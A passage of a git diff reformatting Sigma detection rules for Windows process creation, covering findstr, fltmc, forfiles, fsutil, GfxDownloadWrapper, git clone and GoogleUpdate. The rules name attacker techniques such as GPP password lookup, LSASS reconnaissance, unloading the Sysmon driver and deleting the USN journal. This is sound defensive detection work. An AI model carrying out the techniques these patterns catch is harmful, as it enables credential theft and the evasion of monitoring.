Schedule - - ParentProcessName: C:\Windows\System32\svchost.exe + - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + - ParentProcessName: C:\Windows\System32\svchost.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Domain Controller User Logon diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml index bae588904..6e697862d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml @@ -1,20 +1,16 @@ title: Remote File Download Via Findstr.EXE id: 587254ee-a24b-4335-b3cd-065c0f1f4baa related: - - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f - type: obsoletes + - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f + type: obsoletes status: experimental -description: 'Detects execution of "findstr" with specific flags and a remote share - path. This specific set of CLI flags would allow "findstr" to download the content - of the file located on the remote share as described in the LOLBAS entry. - - ' +description: | + Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali - (Nextron Systems) +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/05 modified: 2023/11/12 tags: @@ -31,19 +27,19 @@ detection: EventID: 4688 Channel: Security selection_findstr: - - CommandLine|contains: findstr - - NewProcessName|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - NewProcessName|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_download_1: - CommandLine|contains: + CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: - CommandLine|contains: + CommandLine|contains: - ' /l ' - ' -l ' selection_cli_download_3: - CommandLine|contains: \\\\ + CommandLine|contains: \\\\ condition: process_creation and (selection_findstr and all of selection_cli_download_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml index c9273888a..8d7ef2b59 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml @@ -1,8 +1,7 @@ title: Findstr GPP Passwords id: 91a2c315-9ee6-4052-a853-6f6a8238f90d status: test -description: Look for the encrypted cpassword value within Group Policy Preference - files on the Domain Controller. This value can be decrypted with gpp-decrypt. +description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr author: frack113 @@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - cpassword - \sysvol\ - .xml diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml index de9d292ed..328487538 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml @@ -1,8 +1,7 @@ title: Findstr Launching .lnk File id: 33339be3-148b-4e16-af56-ad16ec6c7e7b status: test -description: Detects usage of findstr to identify and execute a lnk file as seen within - the HHS redirect attack +description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack references: - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/ author: Trent Liffick @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .lnk - .lnk" - .lnk' diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml index 8876d453c..79ebab53c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml @@ -1,8 +1,7 @@ title: LSASS Process Reconnaissance Via Findstr.EXE id: fe63010f-8823-4864-a96b-a7b4a0f7b929 status: experimental -description: Detects findstring commands that include the keyword lsass, which indicates - recon actviity for the LSASS process PID +description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems) @@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_findstr_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_findstr_cli: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special: - CommandLine|contains: + CommandLine|contains: - ' /i "lsass' - ' /i lsass.exe' - findstr "lsass diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml index 704424551..6c995ef2e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml @@ -1,9 +1,7 @@ title: Permission Misconfiguration Reconnaissance Via Findstr.EXE id: 47e4bab7-c626-47dc-967b-255608c9a920 status: experimental -description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This - is seen being used in combination with "icacls" to look for misconfigured files - or folders permissions +description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,20 +18,24 @@ detection: EventID: 4688 Channel: Security selection_findstr_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_findstr_cli: - CommandLine|contains: + CommandLine|contains: - '"Everyone"' - - '''Everyone''' + - "'Everyone'" - '"BUILTIN\\"' - - '''BUILTIN\''' + - "'BUILTIN\\'" selection_special: - CommandLine|contains|all: + CommandLine|contains|all: + # Example CLI would be: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" + # You could extend it for other groups and users + # Example: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" + # Note: This selection only detects the command when executed from a handler such as a "cmd /c" or "powershell -c" - 'icacls ' - 'findstr ' - Everyone diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml index 03ca3b8c6..b56f62f8a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml @@ -1,15 +1,11 @@ title: Recon Command Output Piped To Findstr.EXE id: ccb5742c-c248-4982-8c5c-5571b9275ad3 related: - - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 - type: derived + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + type: derived status: experimental -description: 'Detects the excution of a potential recon command where the results - are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" - via the "/c" or "/k" for example. Attackers often time use this to extract specific - information they require in their chain. - - ' +description: | + Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain. references: - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf @@ -28,7 +24,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional CLI to increase and enhance coverage - 'ipconfig /all | find ' - 'ipconfig /all | findstr ' - 'ipconfig | find ' diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml index 8aea37d00..b14d5f453 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml @@ -1,16 +1,12 @@ title: Security Tools Keyword Lookup Via Findstr.EXE id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 related: - - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 - type: derived + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + type: derived status: experimental -description: 'Detects execution of "findstr" to search for common names of security - tools. Attackers often pipe the results of recon commands such as "tasklist" or - "whoami" to "findstr" in order to filter out the results. - +description: | + Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ @@ -29,14 +25,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: + # Note: Add additional keywords to increase and enhance coverage + # Note: + # We use the double quote variation because in cases of where the command is executed through cmd for example: + # cmd /c "tasklist | findstr virus" + # Logging utilties such as Sysmon would capture the end quote as part of findstr execution - ' avira' - ' avira"' - ' cb' diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml index 4bd7ee992..203a17187 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml @@ -1,21 +1,16 @@ title: Insensitive Subfolder Search Via Findstr.EXE id: 04936b66-3915-43ad-a8e5-809eadfd1141 related: - - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f - type: obsoletes + - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f + type: obsoletes status: experimental -description: 'Detects execution of findstr with the "s" and "i" flags for a "subfolder" - and "insensitive" search respectively. Attackers sometimes leverage this built-in - utility to search the system for interesting files or filter through results of - commands. - - ' +description: | + Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali - (Nextron Systems) +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/05 modified: 2023/11/12 tags: @@ -32,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_findstr: - - CommandLine|contains: findstr - - NewProcessName|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - NewProcessName|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_search_subfolder: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' -s ' selection_cli_search_insensitive: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' -i ' condition: process_creation and (selection_findstr and all of selection_cli_search_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml index 79b9d1a66..fd916e8b7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml @@ -1,9 +1,7 @@ title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE id: 37db85d1-b089-490a-a59a-c7b6f984f480 status: test -description: Detects usage of "findstr" with the argument "385201". Which could indicate - potential discovery of an installed Sysinternals Sysmon service using the default - driver altitude (even if the name is changed). +description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service author: frack113 @@ -20,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|contains: ' 385201' + CommandLine|contains: ' 385201' # Sysmon driver default altitude condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml b/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml index 160a1e98d..0e34516f9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml @@ -1,8 +1,7 @@ title: Finger.exe Suspicious Invocation id: af491bca-e752-4b44-9c86-df5680533dbc status: test -description: Detects suspicious aged finger.exe tool execution often used in malware - attacks nowadays +description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays references: - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/ @@ -21,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: finger.exe - - NewProcessName|endswith: \finger.exe + - OriginalFileName: finger.exe + - NewProcessName|endswith: \finger.exe condition: process_creation and selection falsepositives: - Admin activity (unclear what they do nowadays with finger.exe) diff --git a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml index b08b9f6ef..3f69999c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml @@ -1,8 +1,8 @@ title: Filter Driver Unloaded Via Fltmc.EXE id: 4931188c-178e-4ee7-a348-39e8a7a56821 related: - - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 - type: derived + - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 # Sysmon specific + type: derived status: test description: Detect filter driver unloading activity via fltmc.exe references: @@ -24,12 +24,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fltMC.exe - - OriginalFileName: fltMC.exe + - NewProcessName|endswith: \fltMC.exe + - OriginalFileName: fltMC.exe selection_cli: - CommandLine|contains: unload + CommandLine|contains: unload filter_avira: - CommandLine|endswith: unload rtp_filesystem_filter + # ParentImage: C:\Users\ciadmin\AppData\Local\Temp\is-URCLK.tmp\endpoint-protection-installer-x64.tmp + CommandLine|endswith: unload rtp_filesystem_filter condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml index 624699a64..b31d78b30 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml @@ -1,8 +1,8 @@ title: Sysmon Driver Unloaded Via Fltmc.EXE id: 4d7cda18-1b12-4e52-b45c-d28653210df8 related: - - id: 4931188c-178e-4ee7-a348-39e8a7a56821 - type: similar + - id: 4931188c-178e-4ee7-a348-39e8a7a56821 # Generic + type: similar status: test description: Detects possible Sysmon filter driver unloaded via fltmc.exe references: @@ -23,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fltMC.exe - - OriginalFileName: fltMC.exe + - NewProcessName|endswith: \fltMC.exe + - OriginalFileName: fltMC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - unload - sysmon condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml b/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml index 8e3d0713b..636a8a8b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml @@ -1,10 +1,8 @@ title: Forfiles.EXE Child Process Masquerading id: f53714ec-5077-420e-ad20-907ff9bb2958 status: experimental -description: 'Detects the execution of "forfiles" from a non-default location, in - order to potentially spawn a custom "cmd.exe" from the current working directory. - - ' +description: | + Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. references: - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/ author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati @@ -20,20 +18,24 @@ detection: EventID: 4688 Channel: Security selection: + # Notes: + # - The parent must not have CLI options + # - The Child Image must be named "cmd" as its hardcoded in the "forfiles" binary + # - The Child CLI will always contains "/c echo" as its hardcoded in the original "forfiles" binary ParentCommandLine|endswith: - .exe - .exe" - CommandLine|startswith: /c echo " - NewProcessName|endswith: \cmd.exe + CommandLine|startswith: /c echo " + NewProcessName|endswith: \cmd.exe filter_main_parent_not_sys: ParentProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ ParentProcessName|endswith: \forfiles.exe - NewProcessName|contains: + NewProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml b/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml index 446fc9086..b4ea07a1b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml +++ b/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml @@ -1,24 +1,19 @@ title: Forfiles Command Execution id: 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b related: - - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 - type: obsoletes - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 + type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: test -description: 'Detects the execution of "forfiles" with the "/c" flag. - - While this is an expected behavior of the tool, it can be abused in order to proxy - execution through it with any binary. - +description: | + Detects the execution of "forfiles" with the "/c" flag. + While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting. - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), - oscd.community +author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2024/01/05 tags: @@ -32,10 +27,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \forfiles.exe - - OriginalFileName: forfiles.exe + - NewProcessName|endswith: \forfiles.exe + - OriginalFileName: forfiles.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' -c ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml b/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml index 4f468925d..600c2e7d2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - NewProcessName|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: drives + CommandLine|contains: drives condition: process_creation and (all of selection_*) falsepositives: - Certain software or administrative tasks may trigger false positives. diff --git a/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml b/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml index b7a90ec86..206f71765 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml @@ -1,13 +1,9 @@ title: Fsutil Behavior Set SymlinkEvaluation id: c0b2768a-dd06-4671-8339-b16ca8d1f27f status: test -description: 'A symbolic link is a type of file that contains a reference to another - file. - - This is probably done to make sure that the ransomware is able to follow shortcuts - on the machine in order to find the original file to encrypt - - ' +description: | + A symbolic link is a type of file that contains a reference to another file. + This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt references: - https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware - https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior @@ -25,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - NewProcessName|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'behavior ' - 'set ' - SymlinkEvaluation diff --git a/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml b/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml index 609c957e4..cefeaa71a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml @@ -1,12 +1,9 @@ title: Fsutil Suspicious Invocation id: add64136-62e5-48ea-807e-88638d02df1e status: stable -description: 'Detects suspicious parameters of fsutil (deleting USN journal, configuring - it with small size, etc). - +description: | + Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others). - - ' references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md @@ -29,13 +26,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - NewProcessName|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: - - deletejournal - - createjournal - - setZeroData + CommandLine|contains: + - deletejournal # usn deletejournal ==> generally ransomware or attacker + - createjournal # usn createjournal ==> can modify config to set it to a tiny size + - setZeroData # file setZeroData ==> empties a file with zeroes condition: process_creation and (all of selection_*) falsepositives: - Admin activity diff --git a/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml index 1ba4f6a7a..9d4bbf30b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via GfxDownloadWrapper.EXE id: eee00933-a761-4cd0-be70-c42fe91731e7 status: test -description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument - to download file. +description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. references: - https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/ author: Victor Sergeev, oscd.community @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - NewProcessName|endswith: \GfxDownloadWrapper.exe + NewProcessName|endswith: \GfxDownloadWrapper.exe filter_main_known_urls: - CommandLine|contains: https://gameplayapi.intel.com/ + CommandLine|contains: https://gameplayapi.intel.com/ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml b/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml index 6e27ce030..3741fcd29 100644 --- a/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml +++ b/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml @@ -1,8 +1,7 @@ title: Suspicious Git Clone id: aef9d1f1-7396-4e92-a927-4567c7a495c1 status: test -description: Detects execution of "git" in order to clone a remote repository that - contain suspicious keywords which might be suspicious +description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt author: Nasreddine Bencherchali (Nextron Systems) @@ -19,16 +18,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \git.exe - - \git-remote-https.exe - - OriginalFileName: git.exe + - NewProcessName|endswith: + - \git.exe + - \git-remote-https.exe + - OriginalFileName: git.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' clone ' - 'git-remote-https ' selection_keyword: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious keywords - exploit - Vulns - vulnerability @@ -37,6 +37,7 @@ detection: - CVE- - poc- - ProofOfConcept + # Add more vuln names - proxyshell - log4shell - eternalblue diff --git a/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml index ae4f3f8cc..7253a47c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious GoogleUpdate Child Process id: 84b1ecf9-6eff-4004-bafb-bae5c0e251b2 related: - - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc - type: derived + - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc + type: derived status: experimental description: Detects potentially suspicious child processes of "GoogleUpdate.exe" references: @@ -22,13 +22,14 @@ detection: selection: ParentProcessName|endswith: \GoogleUpdate.exe filter_main_known_legit: - - NewProcessName|contains: \Google - - NewProcessName|endswith: - - \setup.exe - - chrome_updater.exe - - chrome_installer.exe + # Some other legit child process might exist. It's better to make a baseline before running this in production + - NewProcessName|contains: \Google + - NewProcessName|endswith: + - \setup.exe + - chrome_updater.exe + - chrome_installer.exe filter_main_image_null: - NewProcessName: null + NewProcessName: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml index 66c0de430..f4546c489 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml @@ -18,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml index 805fa5b1c..ecb3d5754 100644 --- 